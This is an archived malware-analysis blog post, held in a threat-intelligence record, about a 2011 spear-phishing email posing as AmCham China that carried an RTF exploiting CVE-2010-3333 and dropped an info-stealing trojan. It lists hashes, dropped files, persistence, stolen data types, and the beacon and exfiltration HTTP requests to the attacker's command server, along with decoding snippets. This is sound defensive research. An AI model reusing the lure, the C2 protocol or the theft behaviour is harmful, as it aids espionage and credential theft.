{
	"id": "dc1f3c6c-bc70-4346-9de8-883b60bd21cd",
	"created_at": "2026-04-06T00:12:20.244884Z",
	"updated_at": "2026-04-10T03:21:03.957525Z",
	"deleted_at": null,
	"sha1_hash": "36a1ab484f47692c8d4c90571054b892fad64366",
	"title": "Jan 6 CVE-2010-3333 DOC with info theft trojan from the American Chamber of Commerce",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1072080,
	"plain_text": "Jan 6 CVE-2010-3333 DOC with info theft trojan from the American\r\nChamber of Commerce\r\nArchived: 2026-04-05 14:19:31 UTC\r\nOriginal Message\r\nFrom: SXXX WXXXXX [mailto:XXXXX@amchamchina.org]\r\nSent: Thursday, January 06, 2011 8:46 PM\r\nTo: XXXXXXXXXXX\r\nSubject: Three Big Risks to China's Economy In 2011\r\nDear XXXXX:\r\nPlease kindly find the attachment for your need.\r\nIf you have any question please let me know.\r\nBest regards,\r\nUlan Tuya         \r\nSenior Communications Manager     \r\n86-10-8519-0835       \r\nutuya@amchamchina.org\r\n***************************\r\nAmCham-China is a non-partisan and independent non-profit organization representing the interests of some 2,600\r\ncompanies and individuals doing\r\nbusiness throughout China. Formally recognized by China’s Ministry of Civil Affairs in 1991, AmCham-China is the leader\r\nat promoting American\r\nbusiness interests in China. Headquartered in Beijing, with chapters in Central China (Wuhan) Tianjin and Dalian, the\r\nChinese government recognizes\r\nAmCham-China as America’s official chamber of commerce. \r\nMessage Headers\r\nReceived: (qmail 12375 invoked from network); 7 Jan 2011 01:46:31 -0000\r\nReceived: from mail.amchamchina.org (HELO amcham.amchamchina.org) (122.200.77.250)\r\n  by XXXXXXXXXXXXXXXX with RC4-SHA encrypted SMTP; 7 Jan 2011 01:46:31 -0000\r\nReceived: from AMCMAIL.amchamchina.org ([122.200.77.246]) by\r\n amcham.amchamchina.org ([122.200.77.250]) with mapi; Fri, 7 Jan 2011 09:48:21\r\n +0800\r\nFrom: SXXX WXXX\r\nhttps://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html\r\nPage 1 of 10\n\nTo: XXXXXXXXXXXXXX\r\nDate: Fri, 7 Jan 2011 09:46:17 +0800\r\nSubject: Three Big Risks to China's Economy In 2011\r\nThread-Topic: Three Big Risks to China's Economy In 2011\r\nThread-Index: AQHLrgx3tarISKEiT0OWHRNyijQ+D5PEvUAO\r\nMessage-ID: \u003c146350E596927B48A9D8F7B0464B167F1762C211CB@AMCMAIL.amchamchina.org\u003e\r\nReferences: \u003c146350E596927B48A9D8F7B0464B167F1762C211CA@AMCMAIL.amchamchina.org\u003e\r\nIn-Reply-To: \u003c146350E596927B48A9D8F7B0464B167F1762C211CA@AMCMAIL.amchamchina.org\u003e\r\nAccept-Language: zh-CN, en-US\r\nContent-Language: zh-CN\r\nX-MS-Has-Attach: yes\r\nX-MS-TNEF-Correlator:\r\nacceptlanguage: zh-CN, en-US\r\nx-tm-as-product-ver: SMEX-8.0.0.4125-6.500.1024-17878.000\r\nx-tm-as-result: No--40.303000-0.000000-31\r\nx-tm-as-user-approved-sender: Yes\r\nx-tm-as-user-blocked-sender: No\r\nContent-Type: multipart/mixed;\r\n    boundary=\"_004_146350E596927B48A9D8F7B0464B167F1762C211CBAMCMAILamcham_\"\r\nMIME-Version: 1.0\r\nSender\r\nIP Information for 122.200.77.250\r\nIP Location: China Beijing Beijing Heju Shuzi Telecom Engineering Co.ltd\r\nResolve Host: mail.amchamchina.org\r\nIP Address: 122.200.77.250    \r\ninetnum:        122.200.64.0 - 122.200.127.255\r\nnetname:        LTEL\r\ndescr:          LONGTEL NETWORKS \u0026 TECHNOLOGIES LTD.\r\ndescr:          Room 601£¬Block B£¬Thunis Development Building\r\ndescr:          No.11 HuiXin East Street,Chaoyang District,\r\ndescr:          Beijing,100029,P.R.C.\r\nchanged:          20080324\r\nsource:         APNIC\r\nperson:         Wang Dan\r\nnic-hdl:        WD501-AP\r\ne-mail:         \r\naddress:        LONGTEL NETWORKS \u0026 TECHNOLOGIES LTD.\r\naddress:        Room 601 Block B Thunis Development Building\r\naddress:        No.11 HuiXin East Street,\r\naddress:        Chaoyang District,Beijing,100029,P.R.C.\r\nphone:          +86-10-64823381\r\nfax-no:         +86-10-64823885\r\ncountry:        CN\r\nchanged:          20070910\r\nmnt-by:         MAINT-NEW\r\nsource:         APNIC\r\nperson:         Ren Weidong\r\nnic-hdl:        RW432-AP\r\ne-mail:         \r\naddress:        LONGTEL NETWORKS \u0026 TECHNOLOGIES LTD.\r\naddress:        Room 601 Block BThunis Development Building\r\naddress:        No.11 HuiXin East Street,\r\naddress:        Chaoyang District,Beijing,100029,P.R.C.\r\nhttps://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html\r\nPage 2 of 10\n\nphone:          +86-10-64823381\r\nfax-no:         +86-10-64823885\r\ncountry:        CN\r\nchanged:          20070910\r\nmnt-by:         MAINT-NEW\r\nsource:         APNIC\r\nAutomated Scans\r\nFile name: Three Big Risks to China's Economy In 2011.doc\r\nhttp://www.virustotal.com/file-scan/report.html?\r\nid=dc1e0b63020d586526320c0bc0f44862ba34f84fb4697e13037d3d4ff54718a1-1294403371Submission date: 2011-01-07\r\n12:29:31 (UTC)\r\nResult: 7 /43 (16.3%)\r\nAvast 4.8.1351.0 2011.01.06 RTF:CVE-2010-3333\r\nAvast5 5.0.677.0 2011.01.06 RTF:CVE-2010-3333\r\nClamAV 0.96.4.0 2011.01.07 BC.Exploit.CVE_2010_3333\r\nGData 21 2011.01.07 RTF:CVE-2010-3333  \r\nMcAfee 5.400.0.1158 2011.01.07 Exploit-CVE2010-3333\r\nMicrosoft 1.6402 2011.01.07 Exploit:Win32/CVE-2010-3333\r\nSophos 4.61.0 2011.01.07 Exp/20103333-A\r\nMD5   : 5a0aac44ddaad1e512a0d505c217baff\r\nSHA1  : ab6f90bf582bf01985989c1e9a99932243402479\r\nSHA256: dc1e0b63020d586526320c0bc0f44862ba34f84fb4697e13037d3d4ff54718a1\r\nssdeep: 768:vAL60V502HFUDmGIFmwFrKBqQA7bzmqhe6XQKOWM2xs/gSdlY:vS60V6BhIE8rKAQWzS6gK\r\nOWeIl\r\nFile size : 51643 bytes\r\nFirst seen: 2011-01-07 12:29:31\r\nLast seen : 2011-01-07 12:29:31\r\nMagic: Rich Text Format data, version 1, unknown character set\r\nTrID:\r\nRich Text Format (100.0%)\r\nFiles Created\r\nFile: userinit.exe\r\nSize: 49664\r\nMD5:  20DD4DD02C2B17A40B26843AA0C660F6\r\nVirustotal\r\nFile name: userinit.exe\r\nSubmission date: 2011-01-07 12:37:11 (UTC)\r\nResult: 6 /42 (14.3%)\r\nAvast 4.8.1351.0 2011.01.07 Win32:Malware-gen\r\nAvast5 5.0.677.0 2011.01.06 Win32:Malware-gen\r\nDrWeb 5.0.2.03300 2011.01.07 Trojan.MulDrop1.47445\r\nF-Secure 9.0.16160.0 2011.01.07 Gen:Trojan.Heur.LP.cu5@a8zokfo\r\nGData 21 2011.01.07 Win32:Malware-gen\r\nJiangmin 13.0.900 2011.01.07 Trojan/Genome.epw\r\nMD5   : 20dd4dd02c2b17a40b26843aa0c660f6\r\n File: userinit.dll\r\nhttp://www.virustotal.com/file-scan/report.html?\r\nid=40aecc6024f83fa2f7b1fdc0b0bcb765d32c62a0b6909dd1ab4821b1f3c64d3f-1294426448\r\nSize: 40960\r\nMD5:  DC574F47A55E022C32A12F55EEC16CC7\r\n File name: userinit.dll\r\nSubmission date: 2011-01-07 18:54:08 (UTC)\r\nResult: 7 /43 (16.3%)\r\nAvast 4.8.1351.0 2011.01.07 Win32:Malware-gen\r\nAvast5 5.0.677.0 2011.01.07 Win32:Malware-gen\r\nhttps://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html\r\nPage 3 of 10\n\nBitDefender 7.2 2011.01.07 Gen:Trojan.Heur.LP.cu4@a8zokfo\r\nComodo 7327 2011.01.07 TrojWare.Win32.PSW.Delf.~JHN\r\nF-Secure 9.0.16160.0 2011.01.07 Gen:Trojan.Heur.LP.cu4@a8zokfo\r\nGData 21 2011.01.07 Gen:Trojan.Heur.LP.cu4@a8zokfo\r\nPanda 10.0.2.7 2011.01.07 Suspicious file\r\nMD5   : dc574f47a55e022c32a12f55eec16cc7\r\nCreated files\r\nC:\\Documents and Settings\\mila\\Local Settings\\Application Data\\Windows\\userinit.dll     MD5: \r\nDC574F47A55E022C32A12F55EEC16CC7\r\nC:\\Documents and Settings\\mila\\Local Settings\\Application Data\\Windows\\userinit.exe     MD5: \r\n20DD4DD02C2B17A40B26843AA0C660F6\r\nC:\\Documents and Settings\\mila\\Start Menu\\Programs\\Startup\\userinit.exe             MD5: \r\n20DD4DD02C2B17A40B26843AA0C660F6\r\nC:\\Documents and Settings\\All Users\\Application Data\\desktop.BIN ``            MD5: \r\n20DD4DD02C2B17A40B26843AA0C660F6\r\nSee Anubis and Joe box reports for more details. Here are a few notes:\r\n1. I did not observe any changes in registry . The persistence is achieved via relaunching the binary from  the infected\r\nuser startup folder (Start Menu\\Programs\\Startup\\userinit.exe), also the there is a copy of the file gets created as All\r\nUsers\\Application Data\\desktop.BIN\r\n2. Userinit.exe creates  folder logs in %userprofile%\\Local Settings\\Application Data\\Windows\\Logs. A shortcut like in\r\nthe image below shows up in that directory for a split second but I did not capture it. This is the file that gets\r\ntransmitted with HTTP POST, MDAwMGhIRUwuMDk in meta part of the URL string can be decoded as\r\nmeta=0000hHEL.09\r\n**POST /windowsupdatev7/search%3Fhl%3DSABBAE4AUwA%3D%26q%3DMQA5ADIALgAxADY\r\nAOAAuADIALgAyAA%3D%3D%26meta%3DMDAwMGhIRUwuMDk%3D%26id%3Dlfdxfir\r\ncvscxggb HTTP/1.1. \r\nThe last part -lfdxfircvscxggb - is changing with each GET request and is possibly an encoded directories names on\r\nthe victim pc (thanks to Villy for the info here)\r\n3. See the Ascii strings below -. It appears the binary gathers the system info (Sysinfo.txt file gets created and deleted),\r\nIP address, and user name for transmission to the remote server. The listing of file extensions\r\n(.doc.xls.pdf.rtf.eml.pgp.vpn.wab.csv.docx.xlsx + **Proxy info****Office info***IE info****Hotfix\r\ninfo****OS info**)  is interesting. We did not observe any file transmissions but possibly obtaining the files with\r\nthe listed extensions is the end goal of the attackers.\r\n4. Villy provided the following info\r\n\"some strings encoded using simple encoding to bypass static analysis by AV\r\nto decode strings used the following aglorithm\r\nfor(i=0;i\r\nit's means that every byte in the string is decreased by number of its position in the string\r\nuserinit.dll - is a service\r\nand installed with svchost(SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\r\n It also grabs protected storage -saved passwords from IE 6.0 and below), and saved outlook passwords, versions\r\nof MS Office and Internet Explorer\r\n5. Hooks userinit.dll into explorer.exe (only Explorer.exe for Windows XP box despite a large number of apps open and\r\nprocesses running) and into multiple processes (observed on Windows 7 box\r\n Windows XP\r\nWindows 7\r\nhttps://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html\r\nPage 4 of 10\n\nNote the html code of the page displayed upon visiting http://globalization.interiorgov.net/windowsupdatev7\r\n    can be seen in the Ascii Strings of the binary\r\n..div align=\"center\"..Under Construction\r\n..div align=\"center\"..;www.microsoft.com\r\nAscii strings (partial) userinit.exe\r\nhttp://anubis.iseclab.org/?action=result\u0026task_id=11c167a3ff87c2e24fd3e993d65ae2aae\r\nNetwork activity\r\nDownload the Anubis generated pcap file \r\n[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]\r\n DNS Queries:\r\n Name: [ globalization.interiorgov.net ], Query Type: [ DNS_TYPE_A ],\r\n Query Result: [ 123.120.107.46 ], Successful: [ 1 ], Protocol: [ udp ]\r\n[=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=]\r\n HTTP Conversations:\r\n to 123.120.107.46:80 - [ globalization.interiorgov.net ]\r\n Request: [ GET /windowsupdatev7/search?hl=UABDAA==\u0026q=MQA5ADIALgAxADYAOAAuADAALgAyAA==\u0026meta=Lg==\u0026i\r\nto 123.120.107.46:80 - [ globalization.interiorgov.net ]\r\n Request: [ GET /windowsupdatev7/search?hl=UABDAA==\u0026q=MQA5ADIALgAxADYAOAAuADAALgAyAA==\u0026meta=Li4=\u0026i\r\nContents of the web server robots.txt file (thanks to Andre')\r\n畂灲瀠潲祸攠牲牯›慦汩摥琠潣湮捥⁴潴朠潬慢楬慺楴湯椮瑮牥潩杲癯渮瑥㠺ര\r\nDomain:     interiorgov.net - Domain History\r\nCache Date:     2011-01-03\r\nhttps://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html\r\nPage 5 of 10\n\nRegistrar:     NAME2HOST, INC. DBA NAME2HOST.COM\r\nServer:     whois.name2host.com\r\nCreated:     2010-09-07\r\nUpdated:     2010-09-07\r\nExpires:     2011-09-07\r\nqingwa20102010@163.com\r\nDomain name: INTERIORGOV.NET\r\n   Updated Date: 2010-09-08\r\n   Creation Date: 2010-09-08\r\n   Expiration Date: 2011-09-08\r\nRegistrar of Record: NAME2HOST, INC.\r\nDomain servers in listed order:\r\n    DNS1.51.NET   118.144.82.171\r\n    DNS2.51.NET   118.145.1.7\r\nIP addresses\r\nThe hosting IP address of the domain keeps changing but within the same provider\r\nIP Address 1 - As recorded on January 7, 2011\r\nIP address 123.120.107.46\r\ninetnum:      123.112.0.0 - 123.127.255.255\r\nnetname:      UNICOM-BJ\r\ndescr:        China Unicom Beijing province network\r\naddress:      No.21,Jin-Rong Street\r\naddress:      Beijing,100140\r\naddress:      P.R.China\r\nphone:        +86-10-66259940\r\nfax-no:       +86-10-66259764\r\nperson:       sun ying\r\naddress:      fu xing men nei da jie 97, Xicheng District\r\naddress:      Beijing 100800\r\nThere are usually 2-4 HTTP GET requests followed by one HTTP POST (12,000-20,000 bytes length), followed by many\r\nHTTP GET requests again. I did not observe more than one HTTP POST per binary execution. The strings in HTTP GET\r\nrequests are identical except for the last part \"id\" of the string (see this code in the binary\r\nABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\r\n/windowsupdatev7/search?hl=%s\u0026q=%s\u0026meta=%s\u0026id=%s)\r\nExample 1\r\nGET\r\n/windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC\r\nHTTP/1.1\r\nGET\r\n/windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC\r\nHTTP/1.1\r\nPOST\r\n/windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC\r\nHTTP/1.1\r\nGET\r\n/windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC\r\nHTTP/1.1\r\nGET\r\n/windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC\r\nHTTP/1.1\r\nGET\r\n/windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC\r\nhttps://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html\r\nPage 6 of 10\n\nHTTP/1.1\r\nGET\r\n/windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC\r\nHTTP/1.1\r\nGET\r\n/windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC\r\nHTTP/1.1\r\nGET\r\n/windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC\r\nHTTP/1.1\r\nGET\r\n/windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC\r\nHTTP/1.1\r\nGET\r\n/windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC\r\nHTTP/1.1\r\nGET\r\n/windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC\r\nHTTP/1.1\r\nGET\r\n/windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC\r\nHTTP/1.1\r\nGET\r\n/windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC\r\nHTTP/1.1\r\nGET\r\n/windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC\r\nHTTP/1.1\r\nExample 2 The strings sometimes retransmit [TCP Retransmission]  and you will see identical GET requests\r\n**GET /windowsupdatev7/search%3Fhl%3DSABBAE4AUwA%3D%26q%3DMQA5ADIALgAxADYA\r\nOAAuADIALgAyAA%3D%3D%26meta%3DLg%3D%3D%26id%3Dphqghumeaylnlfd HTTP/1.1\r\n**GET /windowsupdatev7/search%3Fhl%3DSABBAE4AUwA%3D%26q%3DMQA5ADIALgAxADYA\r\nOAAuADIALgAyAA%3D%3D%26meta%3DLi4%3D%26id%3Dxfircvscxggbwkf HTTP/1.1\r\n**GET /windowsupdatev7/search%3Fhl%3DSABBAE4AUwA%3D%26q%3DMQA5ADIALgAxADYA\r\nOAAuADIALgAyAA%3D%3D%26meta%3DLi4%3D%26id%3Dxfircvscxggbwkf HTTP/1.1\r\n**POST /windowsupdatev7/search%3Fhl%3DSABBAE4AUwA%3D%26q%3DMQA5ADIALgAxADY\r\nAOAAuADIALgAyAA%3D%3D%26meta%3DMDAwMGhIRUwuMDk%3D%26id%3Dlfdxfircvscxggb\r\nHTTP/1.1\r\nStrings can be decoded\r\necho urldecode(\"GET\r\n/windowsupdatev7/search%3Fhl%3DWABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA%26q%3DMQA3ADIALgAyADkALgAwAC4A\r\nHTTP/1.1\");\r\n?\u003e\r\n|||\r\nGET /windowsupdatev7/search?\r\nhl=WABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA\u0026q=MQA3ADIALgAyADkALgAwAC4AMQAxADYA\u0026meta=Lg==\u0026id=amyeh\r\nHTTP/1.1\r\n   \r\nwithout %, %3d - =, %26 - \u0026\r\n|||\r\n \r\necho \"hl=\".base64_decode(\"WABQAFMAUAAzAC0AUgA5ADMALQBPAEYAQwAyADAA\").\"\\n\";\r\necho \"q=\".base64_decode(\"MQA3ADIALgAyADkALgAwAC4AMQAxADYA\").\"\\n\";\r\necho \"meta=\".base64_decode(\"Lg==\u0026\").\"\\n\";\r\necho \"id=\".base64_decode(\"amyehwqnqrqpmxu\").\"\\n\";\r\n?\u003e\r\n|||\r\nhl - compname(unicode string encoded with base64)\r\nhttps://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html\r\nPage 7 of 10\n\nq - ip address(unicode string encoded with base64)\r\nmeta - directory where search(base64 encoded)\r\nid - changing string, presumably a directory name on the victim's pc\r\n|||\r\nthe end result\r\nhl=XPSP3-R93-OFC20\r\nq=172.29.0.116\r\nAs mentioned above, MDAwMGhIRUwuMDk in meta part of the URL string can be decoded as meta=0000hHEL.09\r\n**POST /windowsupdatev7/search%3Fhl%3DSABBAE4AUwA%3D%26q%3DMQA5ADIALgAxADY\r\nAOAAuADIALgAyAA%3D%3D%26meta%3DMDAwMGhIRUwuMDk%3D%26id%3Dlfdxfircvscxggb\r\nHTTP/1.1. \r\nThe last part -lfdxfircvscxggb - is changing with each GET request and is possibly an encoded directories names on the\r\nvictim pc (thanks to Villy for his help with these)\r\nIP Address 2 - Changed between 10 and 11pm January 7, 2011 \r\nIP Address:   114.248.83.92 \r\nNetRange:     114.0.0.0 - 114.255.255.255\r\nnetname:      UNICOM-BJ\r\ndescr:        China Unicom Beijing province network\r\naddress:      No.21,Jin-Rong Street\r\naddress:      Beijing,100140\r\naddress:      P.R.China\r\nphone:        +86-10-66259940\r\nfax-no:       +86-10-66259764\r\nperson:       sun ying\r\naddress:      fu xing men nei da jie 97, Xicheng District\r\naddress:      Beijing 100800\r\nSSL traffic started for environment.interiorgov.net domain, and unlike globalization.interiorgov.net, environment subdomain\r\nis not  hardcoded in the binary downloaded from the server (see 114.248.83.92userinitJan7-11pm.pcap tcp.stream eq 3 -\r\ncorrection from Kyle Yung), all communications always start with globalization.interiorgov.net. Also, the SSL traffic was\r\nobserved only for 114.248.83.92\r\nhttps://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html\r\nPage 8 of 10\n\nExample of SSL traffic\r\nThe following conversation between the server and the victim pc also takes place (thanks to Andre' DiMino for the capture :)\r\nhttps://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html\r\nPage 9 of 10\n\nIP Address 3 - Changed before 9 am on January 8, 2011  \r\nIP Address:   123.120.106.88\r\ninetnum:      123.112.0.0 - 123.127.255.255\r\nnetname:      UNICOM-BJ\r\ndescr:        China Unicom Beijing province network\r\naddress:      No.21,Jin-Rong Street\r\naddress:      Beijing,100140\r\naddress:      P.R.China\r\nphone:        +86-10-66259940\r\nfax-no:       +86-10-66259764\r\nperson:       sun ying\r\naddress:      fu xing men nei da jie 97, Xicheng District\r\naddress:      Beijing 100800\r\nThe hosting history screenshot posted below does not include all the changes for the past two days\r\nSource: https://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html\r\nhttps://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html\r\nPage 10 of 10",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html"
	],
	"report_names": [
		"jan-6-cve-2010-3333-with-info-theft.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434340,
	"ts_updated_at": 1775791263,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/36a1ab484f47692c8d4c90571054b892fad64366.pdf",
		"text": "https://archive.orkl.eu/36a1ab484f47692c8d4c90571054b892fad64366.txt",
		"img": "https://archive.orkl.eu/36a1ab484f47692c8d4c90571054b892fad64366.jpg"
	}
}